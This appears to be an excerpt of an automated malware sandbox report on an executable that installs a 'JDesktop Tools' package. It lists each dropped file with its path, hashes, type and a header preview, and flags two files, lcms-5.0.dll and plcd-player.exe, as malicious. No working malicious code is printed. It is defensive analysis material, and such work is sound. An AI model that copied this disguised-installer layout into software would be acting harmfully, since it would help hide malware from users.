Preview:	/...Copyright (C) 1998-2009 Currency System, Inc. All rights reserved....$VER: Currency System Script Library 4.6../....// Currency object constructor..//..function Currency(code, nameS, nameST, symbol, rateEUR, smallestUnit, regime, physical, legalTender, popularity)..{...this.code = code;...this.nameS = nameS; // singular...this.nameST = nameST; // singular titlestyle...this.symbol = symbol;...this.rateEUR = rateEUR;...this.smallestUnit = smallestUnit;...this.regime = regime;...this.physical = physical;...this.legalTender = legalTender;...this.popularity = popularity;..}....// CurrencySystem object constructor..//..function CurrencySystem()..{...this.version = "4.6";...this.initialized = 0;...//...this.initialize = currencySystem_initialize; // object.method=function(){} syntax not supported in Netscape Navigator 3...this.converterCodeExists = currencySystem_converterCodeExists;...this.converterCodeIsUsed = currencySystem_converterCodeIsUsed;...this.converterUnusedCode = currenc

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Templates\currencysystem5.js Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	18850
Entropy (8bit):	5.252718939622608
Encrypted:	false
SSDEEP:	192:LVJMqzg8F9zp/OQMhEF7IXs1NmrgfTPzD5bL29h1FDiTYyf1CQx/TuTmkk6aez4U:LV2Ig8FanXcmrgfTlwOH1ltsz4v8
MD5:	866B6E8A186BE6005A140CFE9F578CD8
SHA1:	E0B2E5344097EF4C1C0A8BE851C5DE27C7F490DB
SHA-256:	0A5731729919FEDC1A3B81C651087AB200C9470FA75A89BEBEA73AE0478F30E5
SHA-512:	BE84B6A9B893DC0D66113287942A388BAFB0629AE67E6C02A8E09E98A028D50CCFA082A2C1B5BFAFA273ACF9E6338E961FA208B62EF6BEE43D8BFD5E6D4619A9
Malicious:	false
Preview:	/...Copyright (C) 1998-2012 Currency System, Inc. All rights reserved....$VER: Currency System Script Library 5.2../....// Currency object constructor..//..function Currency(code, nameS, nameST, symbol, rateEUR, smallestUnit, regime, physical, legalTender, popularity)..{...this.code = code;...this.nameS = nameS; // singular...this.nameST = nameST; // singular titlestyle...this.symbol = symbol;...this.rateEUR = rateEUR;...this.smallestUnit = smallestUnit;...this.regime = regime;...this.physical = physical;...this.legalTender = legalTender;...this.popularity = popularity;..}....// CurrencySystem object constructor..//..function CurrencySystem()..{...this.version = "5.1";...this.initialized = 0;...//...this.initialize = currencySystem_initialize; // object.method=function(){} syntax not supported in Netscape Navigator 3...this.widgetCurrencyIsListed = currencySystem_widgetCurrencyIsListed;...this.widgetCurrencyIsUsed = currencySystem_widgetCurrencyIsUsed;...this.widgetSuggestUnusedCu

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Templates\currencysystem5.json Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	635
Entropy (8bit):	4.968896753287593
Encrypted:	false
SSDEEP:	12:G3in27KkdcynYKFfaYKQItIl7eTaYKRHTaYKQItI9txrZOaYKB3i8T:G3i27KkdvYKtaYK3qteTaYKRHTaYK3qz
MD5:	D5BE63A1E66E4D6597F49BFD15EB3D83
SHA1:	6B0D0E3101EDB0C92C14691745765DE49CDB7C01
SHA-256:	A1CF701C876F916AACB12A3B952D1D2A38889C2AC118AF9D89493F0A86A45C5D
SHA-512:	6F8CD8F4D18D978F9B30E00322E3CC020B1C3ADD6B6307ED96EBB47B422DD15DDE4BB82698AE755CEF57F8BA3B1BDBD6F47D83CF08471E7B131B8CF8B20ACA55
Malicious:	false
Preview:	{...<currencysystem-insert-header>....."embedLicense": "This service is free to use as long as the banner and link appear on all pages using it. See the Attribution information at currencysystem.com.",..."embedSmallBannerGfx": "https://currencysystem.com/gfx/pub/script-button-88x31.png",..."embedSmallBannerText": "Powered by Currrency System",..."embedSmallBannerLink": "https://currencysystem.com",....."embedSmallHomeGfx": "https://currencysystem.com/gfx/pub/script-icon-16x16.png",..."embedSmallHomeText": "Currrency System Homepage",..."embedSmallHomeLink": "https://currencysystem.com",.....<currencysystem-insert-currencies>..}

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Templates\ecb-eurofxref-daily.xml Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	403
Entropy (8bit):	5.022779704233175
Encrypted:	false
SSDEEP:	6:TMVBd/5Q3JLHAc4Mj/9mc4C7drcDqhsDgLHLvvssw92PXCEZqilvs/BRi8LqfaR/:TMHduFHjFbdrcDWPu2XCMei8Lqai8L/
MD5:	376F44C2269588374F0F7E876BB3CFFA
SHA1:	1241AC750F7CA447D7A74EB516838C39516AA841
SHA-256:	3B96E197B1A47E7A391385638E13A0CF42E04E1665470A89EABECC67D1B91323
SHA-512:	744C894429453B5E40241FEA6A2EBD354BF2B06C5AD9B4439BE1CCACD15B89C487A1FE100851F23E7A2212CCAC600FC8519224855D7AC72F09E6AABD1E8AC6C9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<gesmes:Envelope xmlns:gesmes="http://www.gesmes.org/xml/2002-08-01" xmlns="http://www.ecb.int/vocabulary/2002-08-01/eurofxref">..<gesmes:subject>Reference rates</gesmes:subject>..<gesmes:Sender>...<gesmes:name>European Central Bank</gesmes:name>..</gesmes:Sender>..<Cube>... currencysystem-insert-->... /currencysystem-insert-->..</Cube>.</gesmes:Envelope>.

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {D9FF1A35-78F9-49F0-A6A0-DB3A11387835}, Number of Words: 8, Subject: JDesktop Tools, Author: JDesktop Integration Components (JDIC) Project, Name of Creating Application: Advanced Installer 18.7 build 0a7fdead, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	2233856
Entropy (8bit):	6.540847260876917
Encrypted:	false
SSDEEP:	49152:TDs/YrEUl8VlvfqAE/fQhksQQNgXAo1sVzhly+PkfsJJ10FRzVT8ajBK+ByqV4Tq:GYrEkXAEfs01sVNrajM+
MD5:	9AFC8137B547561655D454AFF862E567
SHA1:	2DAB8B1B9F1AE612E9CD359207751B452C76CB0D
SHA-256:	86747F0567ADBDD895E23E25760AF726A87000BD01EBEF994352EFAD7EB3987C
SHA-512:	91B99B561FBD3C6F3C2583CBF13D9FAF31AAFE6EFDB82667F646AD9F245904D3EF8F37B4CD11E141ECBEBDB7724414E21C4A8F7886CE68FFAC7B0BB8B1B5383B
Malicious:	false
Preview:	......................>...................#...................................I.......v.......................................................................................................................\|...........................................................................................................................................................................................................................................................................................................................c...............%...8........................................................................................... ...!..."...#...$...0.../...'...(...)...*...+...,...-...........6...1...2...3...4...5...9...7...?...C...:...;...<...=...>...B...@...A...K...S...D...E...F...G...H...R.......K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\help.chm Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	325845
Entropy (8bit):	7.966997729785747
Encrypted:	false
SSDEEP:	6144:upVysoxdLmULS5Nv5czGT6ozCF6DWc4kYBDrHDDoicYs0meNdts:iAsWJmUSjBczf3c4dHDDoicYs0re
MD5:	DF113262CBB4AD90D0D889620BDEFB06
SHA1:	D94D2111F9FD566941FF96DBA6237D126591E512
SHA-256:	195BAFB549728E15B392B5A2FCBD41003D2472B1AD82AED449175C37E5834657
SHA-512:	B3DDFCCEFFDE24791DFB9587D5AEBC406B9EC3408B38D50C70AC324931C37FD7F55099C7F84B8359A76ACA1BB0E350977451639CC0E61241EBE16D6F4DB90976
Malicious:	false
Preview:	ITSF....`..........g.......\|.{.......".....\|.{......."..`...............x.......T.......................................ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...5.../#ITBITS..../#IVB...Rd./#STRINGS...U.i./#SYSTEM....;./#TOPICS...5.p./#URLSTR...Y.\|./#URLTBL...%.4./#WINDOWS.....L./$FIftiMain...}..8./$OBJINST...>.?./$WWAssociativeLinks/..../$WWAssociativeLinks/Property...:../$WWKeywordLinks/..../$WWKeywordLinks/Property...6. /about-how-create-a-catalog.html..{.z!/catalog-makers-context-menu.html..u.62/cd-catalog-creator-first-lanche-informations.html..+.[+/checkboxes-options-in-catalog-builder.html...x.../checkboxes_html_117d54ec.png...h.../checkboxes_html_m548d6b7e.png...m.X./checkboxes_html_m59955fe6.png..._.../checkboxes_html_m678cf8a3.png...E.2 /context_menu_html_m6108afb8.png...S.n,/create-order-from-enduser-cd-catalogue.html..A..,/create_a_catalog_related_products_user.html...x.~./how-use-cd-catalog.html

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\icuio58.dll Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54224
Entropy (8bit):	6.686697566242328
Encrypted:	false
SSDEEP:	1536:8n6iCEsBHqIXN0llUofqcOZkE5z7L/cLlvBQ+8iAYS:GuEsdXL/cLlGD1
MD5:	249D164D4361F1BBF827331A2C5B8E64
SHA1:	225AE2D2E277B817962D3A65666706BDF7AE6067
SHA-256:	492ADEB85D95834A97FC2C1BD61347202111A3773CE4DE35FC1597C52BE7AAB3
SHA-512:	16B656E17A305503A01C7429EC44DC9DED0DEC39F50844F5CAFF2484AF3F3551F11B620C63111361A5D333AA16A7DB0A2DC7FF5C895AA6C9252F21CA42223A17
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H.....s_..s_..s_..._..s_F.p^..s_F.v^..s_F.w^..s_F.r^..s_..r^..s_.i._..s_..r_a.s_..w^..s_..v^..s_..s^..s_..._..s_..._..s_..q^..s_Rich..s_........PE..L......Z...........!.....r...6.......r.............J................................"...................................................8................)..............T...............................@............................................text....p.......r.................. ..`.rdata...".......$...v..............@..@.data...............................@....rsrc...8...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\lcms-5.0.dll Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4993536
Entropy (8bit):	6.871255823719978
Encrypted:	false
SSDEEP:	98304:vdG+iN2k+e/VO+0X30DQHDbOXh9A0DESaHafv4UZDCr:A+Hk+eX0BHDbOXh9A0DeHfUZDS
MD5:	B6723B31F67956E747493BC64F2C7A59
SHA1:	72389ECF849BFDA364E84258E5857A3DF07E5BFC
SHA-256:	3361AC8727ABA86AC7F3AAC3A214C3CB76F1AF9FF7EE5E94C52C30FDCB7D5064
SHA-512:	E17FEA164BB00E65BE0E58771A728FC9CED5BD65AE2FEC9E55C5697E69A498404B6D52B529DF774012C9F1268D29D97AD3CAFD404BAD58B3C36535A52AB6E09B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ...A...A...A...9N..A......A......A..4...A..4...A..4...A..4...A..h(...A..4...A...A..C..4...A..G4...A..G4"..A...AJ..A..G4...A..Rich.A..Rich...................PE..L...2.oa...........!.....87.........Py!......P7...............................L......DJ...@.........................P.E.D.....E.......G.H2....................I.,...........................@.B.......B.@............P7..............................text....77......87................. ..`.rdata.......P7......<7.............@..@.data.........F..b....E.............@....rsrc...H2....G..4...DG.............@..@.reloc..,.....I......xI.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\libeay32.dll Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1379352
Entropy (8bit):	6.864605291373112
Encrypted:	false
SSDEEP:	24576:Rcbj++KpP3xREx5Fvvr3WH9IYf0mF8wBpoJqzTi1QA96:Rrpi3r3WH9IYf+wBpoJqzTi1QA96
MD5:	7CC7637AB23A01396206E82EF45CDA0E
SHA1:	209CC6CE91E24383213F1C2456D43E48BD09B8C4
SHA-256:	E6C6568A2CD61E401DB4E4F317F139852502EEBB9FE1FBB9C92D7ECFA6524F7F
SHA-512:	E13C48D6CB7B2983221F00C3FDC5DA4221D6B0383F68D74BCAC2AAF95CC7AE702E65DA517AAD51AD7DAD0B672F8436532F4612E7F0853AE0CA924635F3983F6D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a..J%..%..%..,......,...>..%......!.....%..0..,......,...$..,...$..,...$..Rich%..................PE..L...<K.V...........!.....L...........u.......`...............................@.....................................0...r...l...x.......0................:.........pb..............................0...@............`..(............................text....J.......L.................. ..`.rdata...V...`...X...P..............@..@.data............t..................@....rsrc...0...........................@..@.reloc..P............"..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ml Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PDF document, version 1.5
Category:	dropped
Size (bytes):	418532
Entropy (8bit):	7.992704655006582
Encrypted:	true
SSDEEP:	12288:gC3QjgVE/DGk/1gsQR4jflsCEqmnUT9ca7cgTe9b:F3m7zqieCU4NlTO
MD5:	EF946663D3A336BDACB512BF32C8F8F2
SHA1:	1A02B2DEE5CD8815BA977A09505F0B38FEA27665
SHA-256:	0B77203265ADCB18A878383978BCE5C8D6A1D253FE1EFC16B8B161B42F03B79F
SHA-512:	B5E45C3F22F31FD1538C982C83F75DA1015FF56235B26EA1707DCA6B1BC1E41FB11557593CED91D5BF927B985511DBA4047C898A1FE9EB7903932FDBF6C85829
Malicious:	false
Preview:	%PDF-1.5.%.....2 0 obj.<<./Type /ObjStm./N 100./First 806./Length 1140 ./Filter /FlateDecode.>>.stream.x.V]o.8.\|....h..H.E...m.P\q.........d.r..fe.n....%...........y.....KB...4....d.....$..$i....P...I9.Z.R....I..%.c.#.eZ.)\|.%.g...0i.Q.........E...&.^c..8..g.N.Y!..W.r... .A...!,.`...........0.......O`B.$.t8X",x=.)..BHi....<.$.x.Lb..2.....L.`.l)r..M....^.R.k....%.n.....^..'`..,...3.@e....P...5.Z..8&....9..j.g....\|.H..P.....".Y..D.z1)...$.c..2.&,.....B..du.....&.....T.7j%..P-..#P/.9(&5g....W..=..f.x.fc...{".8.,.w)....0.\..(.%..1..&.'`v...(g.....r.K....;.y.....n.....S...+z.>{......l+...r.{...#x.8....n....._..........1^...u..X.....n.7.9.1..c...Kz.....2t.rQ7..L.q.I.2{....'z.....=....]9....p.0.....n.vU?n...P....n"<...9).cu>.}_.I.be>4]7........$iN._t...1..........t..2....nG..o)..E..6.........r...se..=...;].vz...4......y...S...E=. aH..zp.tP... .Hu;u.f..?...)L......U.P.y..1\|..\.MH..=...C.....[]s?......h....g.B9../..l....k..1:wE.S.v.:

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\plcd-player.exe Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3768184
Entropy (8bit):	6.323324235457555
Encrypted:	false
SSDEEP:	49152:mdziNWio/OWFGZ/7pqfwbAFj1IKdn9kvOIBzuJTHPfw8xZcca9KJi4EIdG:sBaNsKKdn9AzBqw8xZcca9KJi4s
MD5:	25DDBD309BB8094229704383977C7268
SHA1:	1574D860469EE784034093199DC9533543E5C096
SHA-256:	8C7E6A620F4BBC343C2695C2E034CC628062B5C2A6B05461FC41B05436F45147
SHA-512:	16CF4205B16F83A3EFEC96660190EFE254919EA18FBC6EB23F45D5C77B0A4A7EFD5DFA36EC1FC43BD79D1D4959A2FA9E172AB842CE7DE754CDC62912752892BA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......N..,..............O.....X..~....X..~....X..~....X..~.......~........e...\..~....\..~....\.#.......K.....\..~....Rich.....`.SH..R.`[RK..RJ.3RK..R.`.SK..RRichJ..R........................PE..L....,oa.............................u............@...........................9.....q.9...@.................................,S1.d.....4..5...........l9.x.....7.............................@.......H...@...............x............................text.............................. ....rdata..B...........................@..@.data....;...p1..(...T1.............@....rsrc....5....4..6...\|4.............@..@.reloc........7.......7.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ssleay32.dll Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	349720
Entropy (8bit):	6.600820777591867
Encrypted:	false
SSDEEP:	6144:Nv4Nuw10tGJjPZTbGT/yMzU/RSzBnEywGrfG/ySTJ7a7hNl/K5bv3jgNZuDwsLB+:N4Nuw10tGJjPZTbkyMzU/RSzBnHHrf+0
MD5:	F0AED1A32121A577594ECD66980C3ED3
SHA1:	288954A8D6F48639B7605488D2796B14291507E5
SHA-256:	D02CC01A7D9ADC1E6F980D1A56D6A641DF9E2A63FDC5F007264D1BF59ECC1446
SHA-512:	056670F3074AF5A03326C2BE5FFA0FEC23010DDC25BBED07B295EA3F6C7F8DFBC73E40E11E20103EFEB3B230096F630FB0A3CFA61C4E0A74C15A1CB6319D85D9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............r...r...r.......r.......r......r......r...s.4.r....\.r.......r......r......r.Rich..r.................PE..L...<K.V...........!.........l.......).......................................p......................................p...9)......<.... ..0................:...0...,..0...............................x{..@............................................text............................... ..`.rdata..............................@..@.data....[.......@..................@....rsrc...0.... ......................@..@.reloc..b3...0...4..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\decoder.dll Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	207360
Entropy (8bit):	6.451841062476738
Encrypted:	false
SSDEEP:	3072:Xnc8s5yYYVegTR5eO29YoYhNsli0rCckZ9uNDOQH5TmIKO+mAwzvX5Q+M9/:fV79tRUi7ckZSFxPtM9
MD5:	454418EBD68A4E905DC2B9B2E5E1B28C
SHA1:	A54CB6A80D9B95451E2224B6D95DE809C12C9957
SHA-256:	73D5F96A6A30BBD42752BFFC7F20DB61C8422579BF8A53741488BE34B73E1409
SHA-512:	171F85D6F6C44ACC90D80BA4E6220D747E1F4FF4C49A6E8121738E8260F4FCEB01FF2C97172F8A3B20E40E6F6ED29A0397D0C6E5870A9EBFF7B7FB6FAF20C647
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................z.............................r.@.....@.....@.x.........@.....Rich..................PE..L.....Ia.........."!.....X...................p............................................@.........................p...........<....p.. ...............................p........................... ...@............p..t............................text...\V.......X.................. ..`.rdata..\....p.......\..............@..@.data...dV..........................@....rsrc... ....p......................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\holder0.aiph Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	data
Category:	dropped
Size (bytes):	12613117
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	5EB8E16CA980C4FD12FB68F5BDEA2453
SHA1:	A28C1272997B3EE0AFE2C4FB9FBA8153BAE0D6B2
SHA-256:	6FAE30A56DA63F2DDB1E8BA7B636EA0167B8DDEA08F4F600E81DC6393CB624A4
SHA-512:	91245C324225023A98B3A5CCA52F07660D2AB740884BF84083E65347DC8FF9F12322A908D52D6D91D2933834A01AB851816EDDA01229710C3D0FB675F563065F
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\AWSSDK.SimpleDB.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	62088
Entropy (8bit):	5.87884188749315
Encrypted:	false
SSDEEP:	1536:0mzFpEBNMGwcQHanzzd2UE/8YVkEyDrKe2xDBoPnp:dFpEBNMGwcsa8f/8a6Pp
MD5:	5AEB79663EA837F8A7A98DC04674B37A
SHA1:	536C24EF0572354E922A8C4A09CF5350D8A6164D
SHA-256:	E13D9F958783595ACD8ACDBFF4D587BCA7E7B6A3AAB796E2EFBD65BD37431536
SHA-512:	25E4E48EC2162EA6342CFD823E789ED0B5A995BB61FA3FA68364D1EE2468974FA4E75C17EB2CB3DDB213E633136C9AAB139BBF32FB8688FF5B1ABF444E8BB652
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tx..........." ..0.................. ........... .......................@.......x....@.................................H...O....... .................... ......x...8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................\|.......H.......$b.............................................................v.~....}.....(.....r...p(.....r...p.r...p..{....Br...p(........."..(....&...(....:..o.....(....:........(....B..........(....&...(......(....F.(....s....( ...b.(....s....%.o!...( ...6.(.....( ...6..s....(....R..s....%.o!...(....&...( ...:...s....(....V...s....%.o!...(........("...>....s....(....^....s....%..o!...(....2......(#....s$..."..(%....0..........(.....(.........(...+..

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\CrashRpt License.txt Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	5.078244393355221
Encrypted:	false
SSDEEP:	48:rlXOOrpJAzJzGl0PE9432sEs32s3IEtd132RTHy:peOrpJAzJzGlBq3b38OSTS
MD5:	734B7CB601EA82D8B4A9926373323B06
SHA1:	37490788B803335FA3AAD761B3EA0010889B2D8D
SHA-256:	90F301E30B61CDF8AC5E29F4FDD0E81C535FCAABF06B48D36B110A3F35E5A3D2
SHA-512:	273F154273DEDF9B06BBA74AEB81BF905309B6F137A414310B1E96C218095CC6B49EE663932815D6771C9BE1D033B014F57E7AE72C7B7FD396A9C254FA124706
Malicious:	false
Preview:	Copyright (c) 2003, The CrashRpt Project Authors...All rights reserved.....Redistribution and use in source and binary forms, with or without modification, ..are permitted provided that the following conditions are met:.... * Redistributions of source code must retain the above copyright notice, this .. list of conditions and the following disclaimer..... * Redistributions in binary form must reproduce the above copyright notice, .. this list of conditions and the following disclaimer in the documentation .. and/or other materials provided with the distribution..... * Neither the name of the author nor the names of its contributors .. may be used to endorse or promote products derived from this software without .. specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY ..EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES ..OF MERCHANTABILITY AND FITNESS

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Delimon.Win32.IO.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	940032
Entropy (8bit):	7.265468453378986
Encrypted:	false
SSDEEP:	12288:SjtToSCODTjAKMmNRYzUubi85LKHtToSCOD7jAK4mNRP:2Vxtqw/85LKHV1pt
MD5:	40C4EA80985E48C095D9F3AF80215C12
SHA1:	B7EAECB4CF5E45F7E3946BCD1C249A46428CA8C0
SHA-256:	2B1678502F69BCCBA816FE2901A12BD15567C4113D8EC5B0C9EBA3A1AEA7C633
SHA-512:	8C1FCFACEBA8273D4307FDC2AF0E8D137CF162838ED0C9AC198D0A29EC0E4E6B8A6B8C202BC415B2353889B4429ED9B07D784F367B2B339F65090242C78D64AA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......P...........!.....N...........l... ........... ..............................{g....@..................................l..S...................................Pk............................................... ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B.................l......H.......x...............j...n..P .......................................{.Z.L&.$.......v....lk..AC4..{E.0..X.....?3!...^..Q@..L.{._wSIwnsb].E.D...H=.{.s/.....H.f.q.kn...O.1y.\e.A./.[D.:#..T.h..6...}......}.....s....}.....s....}.....(....J.s....}'....(......0..)........{-........(....t......\|-.....(...+...3.....0..)........{-........(....t......\|-.....(...+...3.....0..)........{.........(....t......\|......(...+...3.*....0..)........{.........(....t......\|......(...+.

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ICSharpCode.SharpZipLib.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	200704
Entropy (8bit):	5.683688089372797
Encrypted:	false
SSDEEP:	3072:hjMibqfQqFyGCDXiW9Pp/+Tl4abpuu201PB1BBXIDwtqSPVINrAfvp1:GibqI59PpOPf201/z7p
MD5:	C8164876B6F66616D68387443621510C
SHA1:	7A9DF9C25D49690B6A3C451607D311A866B131F4
SHA-256:	40B3D590F95191F3E33E5D00E534FA40F823D9B1BB2A9AFE05F139C4E0A3AF8D
SHA-512:	44A6ACCC70C312A16D0E533D3287E380997C5E5D610DBEAA14B2DBB5567F2C41253B895C9817ECD96C85D286795BBE6AB35FD2352FDDD9D191669A2FB0774BC4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.K...........!......... ......^.... ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\License.txt Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Non-ISO extended-ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	4532
Entropy (8bit):	4.840297093762095
Encrypted:	false
SSDEEP:	96:D9moghaxhFkV9RGGQwGok+iOJ54d7JdEgUVVN7XzUKyeraku:knhIhmz8pJdLk/7XAKy7x
MD5:	54A36434CA791404E0EE1894A7FB257A
SHA1:	E99BA6366C22F9E4693F6317352EAA5854F0F429
SHA-256:	5FCC77BA8A6D6DCA5ECD466F7706133A17571EAAA1B45D4613E2BF5C58DEC678
SHA-512:	87942ABBE3BC1C87BB77323D4E43D63A30ACE3B569FF16363D871B77A306A64569A8655B0B3A526B31F901BA5F081BFE122B7DF7F0C491637DD3050EC948D071
Malicious:	false
Preview:	MyBusinessCatalog Platinum....Copyright: (c)2002-2021 Alexander Chulpanov..Homepage: http://www.MyBusinessCatalog.com..E-mail: info@MyBusinessCatalog.com..==============================================......You should carefully read the following terms and..conditions before using this software.......MyBusinessCatalog is try-before-buy software. This means:....1. All copyrights to MyBusinessCatalog are exclusively owned by the author . Alexander Chulpanov.....2.1 You can use the FREE version of MyBusinessCatalog with restrictions applicable to unregistered version...The DEMO (free) version allows outputs 50 items (to PDF, Printer etc)..Trial periad - 30 days...If a Mobiliger subscription is already active, the trial period for..MyBusinessCatalog Free is automatically extended.....2.2 Registered version...MyBusinessCatalog Platinum - PDF Studio License...Allows creating PDF and Printable catalogs...Small Business License includes 1 (one) year of free software updates.....MyBusin

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Microsoft.Azure.KeyVault.Core.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16968
Entropy (8bit):	6.369067823836705
Encrypted:	false
SSDEEP:	384:YdX0XY0X+DeljFWt6O9QHRN7fhKtklxHQJ:YdXuhvU8ZOJ
MD5:	FEC0A2AB4AB150DAD477E0D4885637CE
SHA1:	5A3C8920DE1B3F2F7867A20D05C94DE5B2779B81
SHA-256:	746760FE317B9721FB761209F0F9F7E1A5126390970AAC5FD93F11504FFE3D30
SHA-512:	11C7C941D31902CCC9F9E07166CF6E181E0ADF7BAEA0986B863CEFD71591431C0D630018B5514C66D6670BFAD1F8ACD363AC19BED486FB92B06DE83A4669C7A0
